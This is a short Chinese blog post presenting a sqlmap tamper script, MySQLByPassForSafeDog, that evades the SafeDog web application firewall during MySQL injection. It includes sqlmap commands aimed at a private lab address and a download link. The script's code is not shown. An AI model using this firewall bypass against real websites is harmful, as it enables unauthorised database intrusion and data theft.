互动

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

2023-02-28 字数: 1475 阅读耗时: 3 分钟热度: 188 评论: 0

0x01 工具介绍

此Tamper仅仅适用于MySQL数据库，在SQLMap使用过程中添加参数–tamper=MySQLByPassForSafeDog。

0x02 安装与使用

1、安装网站安全狗Apache最新版

微信图片_20230228232501

2、启用安全狗，不加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

微信图片_20230228232533

3、启用安全狗，添加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

微信图片_20230228232606

4、绕过POC

可以添加参数-v 3进行学习查看

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

微信图片_20230228232653

0x03 下载地址

https://lmpan.lmboke.com/MySQLByPassForSafeDog-main.zip

阅读建议

你无需删除空行，直接评论以获取最佳展示效果

标签

统计

文章数 :

277

访问量 :

160890

建站天数 :

2014-08-05